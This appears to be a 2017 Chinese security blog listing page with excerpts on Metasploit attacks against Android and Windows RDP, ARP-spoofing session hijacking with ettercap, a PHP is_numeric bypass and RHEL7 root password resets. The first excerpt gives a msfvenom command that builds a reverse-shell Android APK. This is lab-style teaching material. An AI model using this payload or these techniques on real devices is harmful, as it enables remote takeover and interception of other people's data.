2017年9月21日
利用Metasploit攻击Android
摘要: 首先我在Kali下生成一个Android的应用程序,即apk格式的文件,用到的命令是: msfvenom -p android/meterpreter/reverse_tcp LHOST=本地ip LPORT=监听端口 R > /root/rb.apk 注释:-p:指的是在本次环境中攻击所使用的pa 阅读全文
posted @ 2017-09-21 16:46 wjvzbr 阅读(972) 评论(0) 推荐(0) 编辑
MSF MS12-020RDP漏洞攻击
摘要: Metasploit利用远程桌面协议RDP拒绝访问漏洞(MS12-020) 可以看到3389服务以及启动: 则可以看见主机已经遭受了溢出攻击而蓝屏重启: 而在监听端可以看出整个攻击的DOS全过程: 阅读全文
posted @ 2017-09-21 01:16 wjvzbr 阅读(1050) 评论(0) 推荐(0) 编辑
MSF MS11-050攻击实践及内存保护技术
摘要: 内存攻击指的是攻击者利用软件安全漏洞,构造恶意输入导致软件在处理输入数据时出现非预期错误,将输入数据写入内存中的某些特定敏感位置,从而劫持软件控制流,转而执行外部输入的指令代码,造成目标系统被获取远程控制或被拒绝服务。内存攻击表面原因是软件编写错误,注入过滤输入的条件设置缺陷、变量类型转换错误等,但 阅读全文
posted @ 2017-09-21 00:58 wjvzbr 阅读(875) 评论(0) 推荐(0) 编辑
2017年9月19日
Kali下的内网劫持(三)
摘要: 前面两种说的是在Kali下的ettercap工具通过配合driftnet和urlsnarf进行数据捕获,接下来我要说的是利用Kali下的另外一种抓包分析工具——wireshark来进行捕获数据: 首先还是在主机上监听: 接下来启动wireshark,并且选取抓包网卡eth0:则jiexialjius 阅读全文
posted @ 2017-09-19 21:01 wjvzbr 阅读(646) 评论(0) 推荐(0) 编辑
Kali下的内网劫持(四)
摘要: 在前面我都演示的是在Kali下用命令行的形式将在目标主机上操作的用户的信息捕获的过程,那么接下来我将演示在Kali中用图形界面的ettercap对目标主机的用户进行会话劫持: 首先启动图形界面的ettercap: 接下来将嗅探方式修改为同意嗅探,且嗅探网卡为eth0: 接下来进行在同一局域网内的主机 阅读全文
posted @ 2017-09-19 20:51 wjvzbr 阅读(1256) 评论(0) 推荐(0) 编辑
Kali下的内网劫持(二)
摘要: 前一小节说到在Kali下可以进行捕获客户端的图片,那么同样的,客户端访问的网页也是可以捕获的: 、 以上可以看出监听完毕,那么在被监听端访问阿里云的一个网站: 在监听端用urlsnart这个工具进行捕获,可以看出已经捕获到了: 阅读全文
posted @ 2017-09-19 20:24 wjvzbr 阅读(425) 评论(0) 推荐(0) 编辑
Kali下的内网劫持(一)
摘要: ettercap利用计算机在局域网内进行通信的ARP协议的缺陷进行攻击,在目标主机与服务器之间充当中间人,嗅探两者之间的数据流量,从中窃取用户的数据信息,那么接下来我就给大家演示一下客户端的图片是怎么被劫持的: 首先启动ettrcap这个工具,在这里-T表示文本模式;-q表示安静模式,抓到数据包之后 阅读全文
posted @ 2017-09-19 20:16 wjvzbr 阅读(2506) 评论(0) 推荐(0) 编辑
2017年9月17日
PHP中is_numeric函数十六进制绕过0day
摘要: PHP中is_numeric函数十六进制绕过0day 0×00 简介国内一部分CMS程序里面有用到过is_numberic函数,我们先看看这个函数的结构bool is_numeric ( mixed $var )如果 var 是数字和数字字符串则返回 TRUE,否则返回 FALSE。 0×01 函数 阅读全文
posted @ 2017-09-17 22:06 wjvzbr 阅读(350) 评论(0) 推荐(0) 编辑
Linux之RHEL7root密码破解(三)
摘要: Linux系列root密码破解第三种方式,利用修改boot分区里的开机启动顺序来修改密码,即我们进入BIOS,修改boot启动顺序为CD-ROM: 接下来按F10保存退出 选择Troubleshooting: 以上是说接下来的修复会将尝试寻找Linux的安装程序以及将它挂载到/mnt/sysimag 阅读全文
posted @ 2017-09-17 21:31 wjvzbr 阅读(306) 评论(0) 推荐(0) 编辑
Linux之RHEL7root密码破解(二)
摘要: 破解Linux root密码的第二种方法,如下: 首先开机,进入启动界面,接着找到如下图所示的代码字段,将ro改成rw init=/sysroot/bin/sh ,如下图: 之后按“Ctrl+X”之后,进入如下模式,则切换到根目录: 接下来就是修改密码了: 密码修改成功之后,就下来就是退出重启: 最 阅读全文
posted @ 2017-09-17 20:45 wjvzbr 阅读(351) 评论(0) 推荐(0) 编辑